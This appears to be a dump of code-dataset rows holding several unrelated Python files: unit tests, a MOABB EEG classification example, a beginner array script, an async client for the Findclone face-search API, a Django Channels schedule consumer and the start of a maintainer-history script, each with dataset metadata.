assert pseudo_cone.position == (16, 2, 3)
pseudo_cone.alpha = math.pi/2.
assert pseudo_cone.position.x == pytest.approx(6,0.1)
assert pseudo_cone.position.y == 12
assert pseudo_cone.position.z == 3
def test_displacement(pseudo_angle):
assert pseudo_angle.displacement == (5,10)
pseudo_angle.slide = None
assert pseudo_angle.displacement == 10
def test_set_joint(pseudo_angle):
#Vertical
pseudo_angle.alpha = math.pi/2.
pseudo_angle.set_joint((6,12))
assert pseudo_angle.displacement[0] == pytest.approx(5,0.1)
assert pseudo_angle.displacement[1] == pytest.approx(10,0.1)
#Test no-slide
pseudo_angle.slide = None
pseudo_angle.set_joint((6,12))
assert pseudo_angle.displacement == pytest.approx(10,0.1)
def test_model(pseudo_angle, pseudo_cone):
model = AngledJoint.model(pseudo_angle)
assert isinstance(model.slide, ophyd.SoftPositioner)
assert isinstance(model.lift, ophyd.SoftPositioner)
assert model.displacement == pseudo_angle.displacement
#Test no slide
pseudo_angle.slide = None
model = AngledJoint.model(pseudo_angle)
assert model.slide == None
assert isinstance(model.lift, ophyd.SoftPositioner)
assert model.displacement == pseudo_angle.displacement
#Test cone
model = ConeJoint.model(pseudo_cone)
assert isinstance(model.slide, ophyd.SoftPositioner)
assert isinstance(model.lift, ophyd.SoftPositioner)
assert model.displacement == pseudo_cone.displacement
def test_stop(pseudo_cone):
pseudo_cone.stop()
pseudo_cone.slide.stop_call.method.assert_called_with()
pseudo_cone.lift.stop_call.method.assert_called_with()
def test_cmp():
p1 = PseudoMotor(5)
p2 = PseudoMotor(10)
assert AngledJoint(p1,p2) == AngledJoint(p1, p2)
| it | 0.347528 | 2.250616 | 2 |
tests/test_utils.py | munirjojoverge/rl_AD_urban_baselines | 6 | 13533 | import numpy as np
from urban_AD_env.utils import rotated_rectangles_intersect
def test_rotated_rectangles_intersect():
assert rotated_rectangles_intersect(([12.86076812, 28.60182391], 5.0, 2.0, -0.4675779906495494),
([9.67753944, 28.90585412], 5.0, 2.0, -0.3417019364473201))
assert rotated_rectangles_intersect(([0, 0], 2, 1, 0), ([0, 1], 2, 1, 0))
assert not rotated_rectangles_intersect(([0, 0], 2, 1, 0), ([0, 2.1], 2, 1, 0))
assert not rotated_rectangles_intersect(([0, 0], 2, 1, 0), ([1, 1.1], 2, 1, 0))
assert rotated_rectangles_intersect(([0, 0], 2, 1, np.pi/4), ([1, 1.1], 2, 1, 0))
| import numpy as np
from urban_AD_env.utils import rotated_rectangles_intersect
def test_rotated_rectangles_intersect():
assert rotated_rectangles_intersect(([12.86076812, 28.60182391], 5.0, 2.0, -0.4675779906495494),
([9.67753944, 28.90585412], 5.0, 2.0, -0.3417019364473201))
assert rotated_rectangles_intersect(([0, 0], 2, 1, 0), ([0, 1], 2, 1, 0))
assert not rotated_rectangles_intersect(([0, 0], 2, 1, 0), ([0, 2.1], 2, 1, 0))
assert not rotated_rectangles_intersect(([0, 0], 2, 1, 0), ([1, 1.1], 2, 1, 0))
assert rotated_rectangles_intersect(([0, 0], 2, 1, np.pi/4), ([1, 1.1], 2, 1, 0))
| none | 1 | 2.352878 | 2 |
learning_journal/tests.py | hcodydibble/pyramid-learning-journal | 0 | 13534 | """Functions that test server functions."""
import pytest
from pyramid.httpexceptions import HTTPBadRequest, HTTPNotFound
from datetime import datetime
from learning_journal.models import Entry
def test_list_view_returns_list_of_entries_in_dict(dummy_request):
"""Test for the list_view function."""
from learning_journal.views.default import list_view
response = list_view(dummy_request)
assert 'journals' in response
assert isinstance(response['journals'], list)
def test_adding_to_dummy_db_works(dummy_request):
"""Test that adding to dummy db works."""
assert len(dummy_request.dbsession.query(Entry).all()) == 0
test_entry = Entry(
title="Fake Title",
creation_date=datetime.now(),
body="The body lul"
)
dummy_request.dbsession.add(test_entry)
assert len(dummy_request.dbsession.query(Entry).all()) == 1
def test_list_view_returns_a_dict(dummy_request):
"""Function to test if list_view returns a dict."""
from learning_journal.views.default import list_view
response = list_view(dummy_request)
assert isinstance(response, dict)
def test_list_view_returns_proper_amount_of_content(dummy_request):
"""Home view response has content."""
from learning_journal.views.default import list_view
response = list_view(dummy_request)
query = dummy_request.dbsession.query(Entry).all()
assert len(response["journals"]) == len(query)
def test_about_view_returns_a_dict(dummy_request):
"""Test that about view returns dict."""
from learning_journal.views.default import about_view
response = about_view(dummy_request)
assert isinstance(response, dict)
def test_create_view_returns_a_dict(dummy_request):
"""Test that create view returns dict."""
from learning_journal.views.default import create_view
response = create_view(dummy_request)
assert isinstance(response, dict)
def test_detail_view_returns_post_detail(dummy_request):
"""Test that detail view returns post details."""
from learning_journal.views.default import detail_view
test_entry = Entry(
title="Fake Title",
creation_date=datetime.now(),
body="The body lul"
)
dummy_request.dbsession.add(test_entry)
dummy_request.matchdict['id'] = 1
response = detail_view(dummy_request)
assert response['post'].title == "Fake Title"
def test_create_view_get_empty_is_empty_dict(dummy_request):
"""Test that GET request on create view returns empty dict."""
from learning_journal.views.default import create_view
dummy_request.method = "GET"
response = create_view(dummy_request)
assert response == {}
def test_create_view_post_works(dummy_request):
"""Test that create view post creates new entry."""
from learning_journal.views.default import create_view
dummy_request.method = "POST"
test_post = {"title": "Test", "body": "This is a body."}
dummy_request.POST = test_post
response = create_view(dummy_request)
assert response.status_code == 302
def test_create_view_raises_bad_request(dummy_request):
"""Test that an incomplete post request returns HTTPBadRequest."""
from learning_journal.views.default import create_view
dummy_request.method = "POST"
test_post = {"title": "Test"}
dummy_request.POST = test_post
with pytest.raises(HTTPBadRequest):
create_view(dummy_request)
def test_new_entry_redirects_to_home_page(testapp, empty_db):
"""Test that after adding a new entry you get redirected to home page."""
test_entry = {
"title": "Fake Title",
"body": "The body lul"
}
response = testapp.post("/journal/new-entry", test_entry)
assert response.location == "http://localhost/"
| """Functions that test server functions."""
import pytest
from pyramid.httpexceptions import HTTPBadRequest, HTTPNotFound
from datetime import datetime
from learning_journal.models import Entry
def test_list_view_returns_list_of_entries_in_dict(dummy_request):
"""Test for the list_view function."""
from learning_journal.views.default import list_view
response = list_view(dummy_request)
assert 'journals' in response
assert isinstance(response['journals'], list)
def test_adding_to_dummy_db_works(dummy_request):
"""Test that adding to dummy db works."""
assert len(dummy_request.dbsession.query(Entry).all()) == 0
test_entry = Entry(
title="Fake Title",
creation_date=datetime.now(),
body="The body lul"
)
dummy_request.dbsession.add(test_entry)
assert len(dummy_request.dbsession.query(Entry).all()) == 1
def test_list_view_returns_a_dict(dummy_request):
"""Function to test if list_view returns a dict."""
from learning_journal.views.default import list_view
response = list_view(dummy_request)
assert isinstance(response, dict)
def test_list_view_returns_proper_amount_of_content(dummy_request):
"""Home view response has content."""
from learning_journal.views.default import list_view
response = list_view(dummy_request)
query = dummy_request.dbsession.query(Entry).all()
assert len(response["journals"]) == len(query)
def test_about_view_returns_a_dict(dummy_request):
"""Test that about view returns dict."""
from learning_journal.views.default import about_view
response = about_view(dummy_request)
assert isinstance(response, dict)
def test_create_view_returns_a_dict(dummy_request):
"""Test that create view returns dict."""
from learning_journal.views.default import create_view
response = create_view(dummy_request)
assert isinstance(response, dict)
def test_detail_view_returns_post_detail(dummy_request):
"""Test that detail view returns post details."""
from learning_journal.views.default import detail_view
test_entry = Entry(
title="Fake Title",
creation_date=datetime.now(),
body="The body lul"
)
dummy_request.dbsession.add(test_entry)
dummy_request.matchdict['id'] = 1
response = detail_view(dummy_request)
assert response['post'].title == "Fake Title"
def test_create_view_get_empty_is_empty_dict(dummy_request):
"""Test that GET request on create view returns empty dict."""
from learning_journal.views.default import create_view
dummy_request.method = "GET"
response = create_view(dummy_request)
assert response == {}
def test_create_view_post_works(dummy_request):
"""Test that create view post creates new entry."""
from learning_journal.views.default import create_view
dummy_request.method = "POST"
test_post = {"title": "Test", "body": "This is a body."}
dummy_request.POST = test_post
response = create_view(dummy_request)
assert response.status_code == 302
def test_create_view_raises_bad_request(dummy_request):
"""Test that an incomplete post request returns HTTPBadRequest."""
from learning_journal.views.default import create_view
dummy_request.method = "POST"
test_post = {"title": "Test"}
dummy_request.POST = test_post
with pytest.raises(HTTPBadRequest):
create_view(dummy_request)
def test_new_entry_redirects_to_home_page(testapp, empty_db):
"""Test that after adding a new entry you get redirected to home page."""
test_entry = {
"title": "Fake Title",
"body": "The body lul"
}
response = testapp.post("/journal/new-entry", test_entry)
assert response.location == "http://localhost/"
| pt | 0.155091 | 2.875879 | 3 |
hvad/exceptions.py | Kunpors/dr.pors- | 1 | 13535 | <filename>hvad/exceptions.py
""" Hvad-specific exceptions
Part of hvad public API.
"""
__all__ = ('WrongManager', )
class WrongManager(Exception):
""" Raised when attempting to introspect translated fields from
shared models without going through hvad. The most likely cause
for this being accessing translated fields from
translation-unaware QuerySets.
"""
def __init__(self, meta, name):
self.meta = meta
self.name = name
def __str__(self):
return (
"Accessing translated fields like {model_name}.{field_name} from "
"an regular model requires a translation-aware queryset, "
"obtained with the .language() method. "
"For regular, non-translatable models, you can get one using "
"hvad.utils.get_translation_aware_manager"
).format(
app_label=self.meta.app_label,
model_name=self.meta.model_name,
field_name=self.name,
)
| <filename>hvad/exceptions.py
""" Hvad-specific exceptions
Part of hvad public API.
"""
__all__ = ('WrongManager', )
class WrongManager(Exception):
""" Raised when attempting to introspect translated fields from
shared models without going through hvad. The most likely cause
for this being accessing translated fields from
translation-unaware QuerySets.
"""
def __init__(self, meta, name):
self.meta = meta
self.name = name
def __str__(self):
return (
"Accessing translated fields like {model_name}.{field_name} from "
"an regular model requires a translation-aware queryset, "
"obtained with the .language() method. "
"For regular, non-translatable models, you can get one using "
"hvad.utils.get_translation_aware_manager"
).format(
app_label=self.meta.app_label,
model_name=self.meta.model_name,
field_name=self.name,
)
| pt | 0.14209 | 2.305009 | 2 |
examples/ERP/classify_P300_bi.py | gcattan/pyRiemann-qiskit | 7 | 13536 | <reponame>gcattan/pyRiemann-qiskit
"""
====================================================================
Classification of P300 datasets from MOABB
====================================================================
It demonstrates the QuantumClassifierWithDefaultRiemannianPipeline(). This
pipeline uses Riemannian Geometry, Tangent Space and a quantum SVM
classifier. MOABB is used to access many EEG datasets and also for the
evaluation and comparison with other classifiers.
In QuantumClassifierWithDefaultRiemannianPipeline():
If parameter "shots" is None then a classical SVM is used similar to the one
in scikit learn.
If "shots" is not None and IBM Qunatum token is provided with "q_account_token"
then a real Quantum computer will be used.
You also need to adjust the "n_components" in the PCA procedure to the number
of qubits supported by the real quantum computer you are going to use.
A list of real quantum computers is available in your IBM quantum account.
"""
# Author: <NAME>
# Modified from plot_classify_EEG_tangentspace.py of pyRiemann
# License: BSD (3-clause)
from pyriemann.estimation import XdawnCovariances
from pyriemann.tangentspace import TangentSpace
from sklearn.pipeline import make_pipeline
from matplotlib import pyplot as plt
import warnings
import seaborn as sns
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
from moabb import set_log_level
from moabb.datasets import bi2012
from moabb.evaluations import WithinSessionEvaluation
from moabb.paradigms import P300
from pyriemann_qiskit.classification import \
QuantumClassifierWithDefaultRiemannianPipeline
from sklearn.decomposition import PCA
print(__doc__)
##############################################################################
# getting rid of the warnings about the future
warnings.simplefilter(action="ignore", category=FutureWarning)
warnings.simplefilter(action="ignore", category=RuntimeWarning)
warnings.filterwarnings("ignore")
set_log_level("info")
##############################################################################
# Create Pipelines
# ----------------
#
# Pipelines must be a dict of sklearn pipeline transformer.
##############################################################################
# We have to do this because the classes are called 'Target' and 'NonTarget'
# but the evaluation function uses a LabelEncoder, transforming them
# to 0 and 1
labels_dict = {"Target": 1, "NonTarget": 0}
paradigm = P300(resample=128)
datasets = [bi2012()] # MOABB provides several other P300 datasets
# reduce the number of subjects, the Quantum pipeline takes a lot of time
# if executed on the entire dataset
n_subjects = 5
for dataset in datasets:
dataset.subject_list = dataset.subject_list[0:n_subjects]
overwrite = True # set to True if we want to overwrite cached results
pipelines = {}
# A Riemannian Quantum pipeline provided by pyRiemann-qiskit
# You can choose between classical SVM and Quantum SVM.
pipelines["RG+QuantumSVM"] = QuantumClassifierWithDefaultRiemannianPipeline(
shots=None, # 'None' forces classic SVM
nfilter=2, # default 2
# default n_components=10, a higher value renders better performance with
# the non-qunatum SVM version used in qiskit
# On a real Quantum computer (n_components = qubits)
dim_red=PCA(n_components=5),
# params={'q_account_token': '<IBM Quantum TOKEN>'}
)
# Here we provide a pipeline for comparison:
# This is a standard pipeline similar to
# QuantumClassifierWithDefaultRiemannianPipeline, but with LDA classifier
# instead.
pipelines["RG+LDA"] = make_pipeline(
# applies XDawn and calculates the covariance matrix, output it matrices
XdawnCovariances(
nfilter=2,
classes=[labels_dict["Target"]],
estimator="lwf",
xdawn_estimator="scm"
),
TangentSpace(),
PCA(n_components=10),
LDA(solver="lsqr", shrinkage="auto"), # you can use other classifiers
)
print("Total pipelines to evaluate: ", len(pipelines))
evaluation = WithinSessionEvaluation(
paradigm=paradigm,
datasets=datasets,
suffix="examples",
overwrite=overwrite
)
results = evaluation.process(pipelines)
print("Averaging the session performance:")
print(results.groupby('pipeline').mean('score')[['score', 'time']])
##############################################################################
# Plot Results
# ----------------
#
# Here we plot the results to compare the two pipelines
fig, ax = plt.subplots(facecolor="white", figsize=[8, 4])
sns.stripplot(
data=results,
y="score",
x="pipeline",
ax=ax,
jitter=True,
alpha=0.5,
zorder=1,
palette="Set1",
)
sns.pointplot(data=results,
y="score",
x="pipeline",
ax=ax, zorder=1,
palette="Set1")
ax.set_ylabel("ROC AUC")
ax.set_ylim(0.3, 1)
plt.show()
| """
====================================================================
Classification of P300 datasets from MOABB
====================================================================
It demonstrates the QuantumClassifierWithDefaultRiemannianPipeline(). This
pipeline uses Riemannian Geometry, Tangent Space and a quantum SVM
classifier. MOABB is used to access many EEG datasets and also for the
evaluation and comparison with other classifiers.
In QuantumClassifierWithDefaultRiemannianPipeline():
If parameter "shots" is None then a classical SVM is used similar to the one
in scikit learn.
If "shots" is not None and IBM Qunatum token is provided with "q_account_token"
then a real Quantum computer will be used.
You also need to adjust the "n_components" in the PCA procedure to the number
of qubits supported by the real quantum computer you are going to use.
A list of real quantum computers is available in your IBM quantum account.
"""
# Author: <NAME>
# Modified from plot_classify_EEG_tangentspace.py of pyRiemann
# License: BSD (3-clause)
from pyriemann.estimation import XdawnCovariances
from pyriemann.tangentspace import TangentSpace
from sklearn.pipeline import make_pipeline
from matplotlib import pyplot as plt
import warnings
import seaborn as sns
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
from moabb import set_log_level
from moabb.datasets import bi2012
from moabb.evaluations import WithinSessionEvaluation
from moabb.paradigms import P300
from pyriemann_qiskit.classification import \
QuantumClassifierWithDefaultRiemannianPipeline
from sklearn.decomposition import PCA
print(__doc__)
##############################################################################
# getting rid of the warnings about the future
warnings.simplefilter(action="ignore", category=FutureWarning)
warnings.simplefilter(action="ignore", category=RuntimeWarning)
warnings.filterwarnings("ignore")
set_log_level("info")
##############################################################################
# Create Pipelines
# ----------------
#
# Pipelines must be a dict of sklearn pipeline transformer.
##############################################################################
# We have to do this because the classes are called 'Target' and 'NonTarget'
# but the evaluation function uses a LabelEncoder, transforming them
# to 0 and 1
labels_dict = {"Target": 1, "NonTarget": 0}
paradigm = P300(resample=128)
datasets = [bi2012()] # MOABB provides several other P300 datasets
# reduce the number of subjects, the Quantum pipeline takes a lot of time
# if executed on the entire dataset
n_subjects = 5
for dataset in datasets:
dataset.subject_list = dataset.subject_list[0:n_subjects]
overwrite = True # set to True if we want to overwrite cached results
pipelines = {}
# A Riemannian Quantum pipeline provided by pyRiemann-qiskit
# You can choose between classical SVM and Quantum SVM.
pipelines["RG+QuantumSVM"] = QuantumClassifierWithDefaultRiemannianPipeline(
shots=None, # 'None' forces classic SVM
nfilter=2, # default 2
# default n_components=10, a higher value renders better performance with
# the non-qunatum SVM version used in qiskit
# On a real Quantum computer (n_components = qubits)
dim_red=PCA(n_components=5),
# params={'q_account_token': '<IBM Quantum TOKEN>'}
)
# Here we provide a pipeline for comparison:
# This is a standard pipeline similar to
# QuantumClassifierWithDefaultRiemannianPipeline, but with LDA classifier
# instead.
pipelines["RG+LDA"] = make_pipeline(
# applies XDawn and calculates the covariance matrix, output it matrices
XdawnCovariances(
nfilter=2,
classes=[labels_dict["Target"]],
estimator="lwf",
xdawn_estimator="scm"
),
TangentSpace(),
PCA(n_components=10),
LDA(solver="lsqr", shrinkage="auto"), # you can use other classifiers
)
print("Total pipelines to evaluate: ", len(pipelines))
evaluation = WithinSessionEvaluation(
paradigm=paradigm,
datasets=datasets,
suffix="examples",
overwrite=overwrite
)
results = evaluation.process(pipelines)
print("Averaging the session performance:")
print(results.groupby('pipeline').mean('score')[['score', 'time']])
##############################################################################
# Plot Results
# ----------------
#
# Here we plot the results to compare the two pipelines
fig, ax = plt.subplots(facecolor="white", figsize=[8, 4])
sns.stripplot(
data=results,
y="score",
x="pipeline",
ax=ax,
jitter=True,
alpha=0.5,
zorder=1,
palette="Set1",
)
sns.pointplot(data=results,
y="score",
x="pipeline",
ax=ax, zorder=1,
palette="Set1")
ax.set_ylabel("ROC AUC")
ax.set_ylim(0.3, 1)
plt.show() | it | 0.253788 | 2.234227 | 2 |
copy-the-content-of-one-array-into-another-in-the-reverse-order.py | kRituraj/python-programming | 0 | 13537 | <filename>copy-the-content-of-one-array-into-another-in-the-reverse-order.py
from array import *
MyArray = [None] * 20
MyArray1 = [None] * 20
i = 0
while(i < 20):
MyArray[i] = i + 1
i = i + 1
j = 0
i = 19
while(j < 20):
MyArray1[j] = MyArray[i]
j = j + 1
i = i - 1
i = 0
while(i < 20):
print(MyArray1[i],end = " ")
i = i + 1 | <filename>copy-the-content-of-one-array-into-another-in-the-reverse-order.py
from array import *
MyArray = [None] * 20
MyArray1 = [None] * 20
i = 0
while(i < 20):
MyArray[i] = i + 1
i = i + 1
j = 0
i = 19
while(j < 20):
MyArray1[j] = MyArray[i]
j = j + 1
i = i - 1
i = 0
while(i < 20):
print(MyArray1[i],end = " ")
i = i + 1 | none | 1 | 3.541529 | 4 |
Findclone/aiofindclone.py | vypivshiy/Findclone_api | 5 | 13538 | from aiohttp import ClientSession, FormData
from Findclone import __version__
from .models import Account, Profiles, Histories, get_builder
from .utils import random_string, paint_boxes
from .exceptions import a_error_handler, FindcloneError
from io import BufferedReader, BytesIO
class FindcloneAsync:
"""async findclone api class
Attributes:
headers : dict - set requests headers
"""
def __init__(self):
self._session = ClientSession()
self.headers = {"User-Agent": f"findclone-api/{__version__}"}
self.__builder = get_builder().build_aio_response
self._session_key = None
self._userid = None
self.__info = None
async def login(self,
login: [str, None] = None,
password: [str, None] = None,
session_key: [str, None] = None,
userid: [str, int, None] = None) -> bool:
"""
*coro
Findclone authorisation
:param login: account login
:param password: account password
:param session_key: account session_key
:param userid: account userid
:return: True is auth success
"""
if login and password:
async with self._session.post("https://findclone.ru/login", data={"phone": login,
"password": password}) as response:
await a_error_handler(response)
resp = await response.json()
self.__info = await self.__builder(response)
self._session_key = resp["session_key"]
self._userid = resp["userid"]
self.headers.update({'session-key': self._session_key, 'user-id': str(self._userid)})
return True
elif session_key and userid:
self.headers.update({"session-key": session_key, "user-id": str(userid)})
async with self._session.get("https://findclone.ru/profile", headers=self.headers) as response:
await a_error_handler(response)
self.__info = await self.__builder(response)
self._session_key = session_key
self._userid = userid
return True
else:
raise FindcloneError("Need login and password or session-key and _userid")
@property
async def info(self) -> Account:
"""
*coro
return account information
:return: Account object
"""
async with self._session.get("https://findclone.ru/profile", headers=self.headers) as response:
info = await self.__builder(response)
self.__info = info
return info
async def upload(self,
file: [str, BufferedReader],
face_box_id: int = None,
timeout: float = 180) -> [Profiles, BytesIO]:
"""
*coro
upload image or image url and return Profiles object or BytesIO object
:param file: image direct download link or path
:param face_box_id: OPTIONAL, send facebox id if 2 or more faces are detected
:param timeout: OPTIONAL - max timeout delay
:return: Profiles object or BytesIO if 2 or more faces are detected
"""
data = FormData()
if file.startswith("http"):
async with self._session.get(file, headers=self.headers) as response:
file = await response.read()
data.add_field("uploaded_photo", file, filename=f"{random_string()}.png", content_type="image/png")
else:
data.add_field("uploaded_photo", open(file, "rb"), filename=f"{random_string()}.png",
content_type="image/png")
async with self._session.post("https://findclone.ru/upload2", data=data, headers=self.headers,
timeout=timeout) as response:
resp = await response.json()
if resp.get("faceBoxes"):
if face_box_id is not None:
async with self._session.get("https://findclone.ru/upload3", params={"id": face_box_id},
headers=self.headers) as response2:
resp = await self.__builder(response2)
return resp
else:
img_bytes = paint_boxes(file, resp) # return bytesIO object
return img_bytes
resp = await self.__builder(response)
return resp
async def history(self, offset: int = 0, count: int = 100) -> Histories:
"""
*coro
return object histories search for account
:param offset: int
:param count: int
:return: Histories object
"""
async with self._session.get("https://findclone.ru/hist", params={"offset": offset, "count": count},
headers=self.headers) as response:
history = await self.__builder(response)
return history
async def search(self, search_id: [int, str], count: int = 128) -> Profiles:
"""
*coro
:param search_id: [int, str] search id
:param count: [int] max Profiles count get
:return: Profiles object
"""
async with self._session.get("https://findclone.ru/search", params={"id": search_id, "count": count},
headers=self.headers) as response:
search_result = await self.__builder(response)
return search_result
@property
def get_session(self) -> dict:
"""
property
return session-key and _userid account
:return: dict {"session-key": session_key, "user-id": userid}
"""
_session = {"session-key": self._session_key, "user-id": self._userid}
return _session
def __str__(self):
return self.__info.__str__()
async def __aenter__(self) -> 'FindcloneAsync':
return self
async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:
await self._session.close()
async def close(self) -> None:
await self._session.close()
| from aiohttp import ClientSession, FormData
from Findclone import __version__
from .models import Account, Profiles, Histories, get_builder
from .utils import random_string, paint_boxes
from .exceptions import a_error_handler, FindcloneError
from io import BufferedReader, BytesIO
class FindcloneAsync:
"""async findclone api class
Attributes:
headers : dict - set requests headers
"""
def __init__(self):
self._session = ClientSession()
self.headers = {"User-Agent": f"findclone-api/{__version__}"}
self.__builder = get_builder().build_aio_response
self._session_key = None
self._userid = None
self.__info = None
async def login(self,
login: [str, None] = None,
password: [str, None] = None,
session_key: [str, None] = None,
userid: [str, int, None] = None) -> bool:
"""
*coro
Findclone authorisation
:param login: account login
:param password: account password
:param session_key: account session_key
:param userid: account userid
:return: True is auth success
"""
if login and password:
async with self._session.post("https://findclone.ru/login", data={"phone": login,
"password": password}) as response:
await a_error_handler(response)
resp = await response.json()
self.__info = await self.__builder(response)
self._session_key = resp["session_key"]
self._userid = resp["userid"]
self.headers.update({'session-key': self._session_key, 'user-id': str(self._userid)})
return True
elif session_key and userid:
self.headers.update({"session-key": session_key, "user-id": str(userid)})
async with self._session.get("https://findclone.ru/profile", headers=self.headers) as response:
await a_error_handler(response)
self.__info = await self.__builder(response)
self._session_key = session_key
self._userid = userid
return True
else:
raise FindcloneError("Need login and password or session-key and _userid")
@property
async def info(self) -> Account:
"""
*coro
return account information
:return: Account object
"""
async with self._session.get("https://findclone.ru/profile", headers=self.headers) as response:
info = await self.__builder(response)
self.__info = info
return info
async def upload(self,
file: [str, BufferedReader],
face_box_id: int = None,
timeout: float = 180) -> [Profiles, BytesIO]:
"""
*coro
upload image or image url and return Profiles object or BytesIO object
:param file: image direct download link or path
:param face_box_id: OPTIONAL, send facebox id if 2 or more faces are detected
:param timeout: OPTIONAL - max timeout delay
:return: Profiles object or BytesIO if 2 or more faces are detected
"""
data = FormData()
if file.startswith("http"):
async with self._session.get(file, headers=self.headers) as response:
file = await response.read()
data.add_field("uploaded_photo", file, filename=f"{random_string()}.png", content_type="image/png")
else:
data.add_field("uploaded_photo", open(file, "rb"), filename=f"{random_string()}.png",
content_type="image/png")
async with self._session.post("https://findclone.ru/upload2", data=data, headers=self.headers,
timeout=timeout) as response:
resp = await response.json()
if resp.get("faceBoxes"):
if face_box_id is not None:
async with self._session.get("https://findclone.ru/upload3", params={"id": face_box_id},
headers=self.headers) as response2:
resp = await self.__builder(response2)
return resp
else:
img_bytes = paint_boxes(file, resp) # return bytesIO object
return img_bytes
resp = await self.__builder(response)
return resp
async def history(self, offset: int = 0, count: int = 100) -> Histories:
"""
*coro
return object histories search for account
:param offset: int
:param count: int
:return: Histories object
"""
async with self._session.get("https://findclone.ru/hist", params={"offset": offset, "count": count},
headers=self.headers) as response:
history = await self.__builder(response)
return history
async def search(self, search_id: [int, str], count: int = 128) -> Profiles:
"""
*coro
:param search_id: [int, str] search id
:param count: [int] max Profiles count get
:return: Profiles object
"""
async with self._session.get("https://findclone.ru/search", params={"id": search_id, "count": count},
headers=self.headers) as response:
search_result = await self.__builder(response)
return search_result
@property
def get_session(self) -> dict:
"""
property
return session-key and _userid account
:return: dict {"session-key": session_key, "user-id": userid}
"""
_session = {"session-key": self._session_key, "user-id": self._userid}
return _session
def __str__(self):
return self.__info.__str__()
async def __aenter__(self) -> 'FindcloneAsync':
return self
async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:
await self._session.close()
async def close(self) -> None:
await self._session.close()
| pt | 0.153259 | 2.319211 | 2 |
src/program/consumers.py | pwelzel/bornhack-website | 0 | 13539 | <filename>src/program/consumers.py<gh_stars>0
from channels.generic.websocket import JsonWebsocketConsumer
from camps.models import Camp
from .models import (
Event,
EventInstance,
Favorite,
EventLocation,
EventType,
EventTrack,
Speaker
)
class ScheduleConsumer(JsonWebsocketConsumer):
groups = ['schedule_users']
def receive(self, text_data, **kwargs):
user = self.scope['user']
content = self.decode_json(text_data)
action = content.get('action')
data = {}
if action == 'init':
camp_slug = content.get('camp_slug')
try:
camp = Camp.objects.get(slug=camp_slug)
days = list(map(
lambda day:
{
'repr': day.lower.strftime('%A %Y-%m-%d'),
'iso': day.lower.strftime('%Y-%m-%d'),
'day_name': day.lower.strftime('%A'),
},
camp.get_days('camp')
))
events_query_set = Event.objects.filter(track__camp=camp)
events = list([x.serialize() for x in events_query_set])
event_instances_query_set = EventInstance.objects.filter(
event__track__camp=camp
)
event_instances = list([
x.serialize(user=user)
for x in event_instances_query_set
])
event_locations_query_set = EventLocation.objects.filter(
camp=camp
)
event_locations = list([
x.serialize()
for x in event_locations_query_set
])
event_types_query_set = EventType.objects.filter()
event_types = list([
x.serialize()
for x in event_types_query_set
])
event_tracks_query_set = EventTrack.objects.filter(
camp=camp
)
event_tracks = list([
x.serialize()
for x in event_tracks_query_set
])
speakers_query_set = Speaker.objects.filter(camp=camp)
speakers = list([x.serialize() for x in speakers_query_set])
data = {
"action": "init",
"events": events,
"event_instances": event_instances,
"event_locations": event_locations,
"event_types": event_types,
"event_tracks": event_tracks,
"speakers": speakers,
"days": days,
}
except Camp.DoesNotExist:
pass
if action == 'favorite':
event_instance_id = content.get('event_instance_id')
event_instance = EventInstance.objects.get(id=event_instance_id)
Favorite.objects.create(
user=user,
event_instance=event_instance
)
if action == 'unfavorite':
try:
event_instance_id = content.get('event_instance_id')
event_instance = EventInstance.objects.get(
id=event_instance_id
)
favorite = Favorite.objects.get(
event_instance=event_instance,
user=user
)
favorite.delete()
except Favorite.DoesNotExist:
# We don't want to do anything.
return
if data:
self.send_json(data)
def disconnect(self, message, **kwargs):
pass
| <filename>src/program/consumers.py<gh_stars>0
from channels.generic.websocket import JsonWebsocketConsumer
from camps.models import Camp
from .models import (
Event,
EventInstance,
Favorite,
EventLocation,
EventType,
EventTrack,
Speaker
)
class ScheduleConsumer(JsonWebsocketConsumer):
groups = ['schedule_users']
def receive(self, text_data, **kwargs):
user = self.scope['user']
content = self.decode_json(text_data)
action = content.get('action')
data = {}
if action == 'init':
camp_slug = content.get('camp_slug')
try:
camp = Camp.objects.get(slug=camp_slug)
days = list(map(
lambda day:
{
'repr': day.lower.strftime('%A %Y-%m-%d'),
'iso': day.lower.strftime('%Y-%m-%d'),
'day_name': day.lower.strftime('%A'),
},
camp.get_days('camp')
))
events_query_set = Event.objects.filter(track__camp=camp)
events = list([x.serialize() for x in events_query_set])
event_instances_query_set = EventInstance.objects.filter(
event__track__camp=camp
)
event_instances = list([
x.serialize(user=user)
for x in event_instances_query_set
])
event_locations_query_set = EventLocation.objects.filter(
camp=camp
)
event_locations = list([
x.serialize()
for x in event_locations_query_set
])
event_types_query_set = EventType.objects.filter()
event_types = list([
x.serialize()
for x in event_types_query_set
])
event_tracks_query_set = EventTrack.objects.filter(
camp=camp
)
event_tracks = list([
x.serialize()
for x in event_tracks_query_set
])
speakers_query_set = Speaker.objects.filter(camp=camp)
speakers = list([x.serialize() for x in speakers_query_set])
data = {
"action": "init",
"events": events,
"event_instances": event_instances,
"event_locations": event_locations,
"event_types": event_types,
"event_tracks": event_tracks,
"speakers": speakers,
"days": days,
}
except Camp.DoesNotExist:
pass
if action == 'favorite':
event_instance_id = content.get('event_instance_id')
event_instance = EventInstance.objects.get(id=event_instance_id)
Favorite.objects.create(
user=user,
event_instance=event_instance
)
if action == 'unfavorite':
try:
event_instance_id = content.get('event_instance_id')
event_instance = EventInstance.objects.get(
id=event_instance_id
)
favorite = Favorite.objects.get(
event_instance=event_instance,
user=user
)
favorite.delete()
except Favorite.DoesNotExist:
# We don't want to do anything.
return
if data:
self.send_json(data)
def disconnect(self, message, **kwargs):
pass
| es | 0.244204 | 2.154123 | 2 |
rrs/tools/rrs_maintainer_history.py | WindRiver-OpenSourceLabs/layerindex-web | 0 | 13540 | #!/usr/bin/env python3
# Standalone script which rebuilds the history of maintainership
#
# Copyright (C) 2015 Intel Corporation
# Author: <NAME> <<EMAIL>>
#
# Licensed under the MIT license, see COPYING.MIT for details
import sys
import os.path
import optparse
import logging
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__))))
from common import common_setup, get_logger, DryRunRollbackException
common_setup()
from layerindex import utils, recipeparse
utils.setup_django()
from django.db import transaction
import settings
from layerindex.models import Recipe, LayerBranch, LayerItem
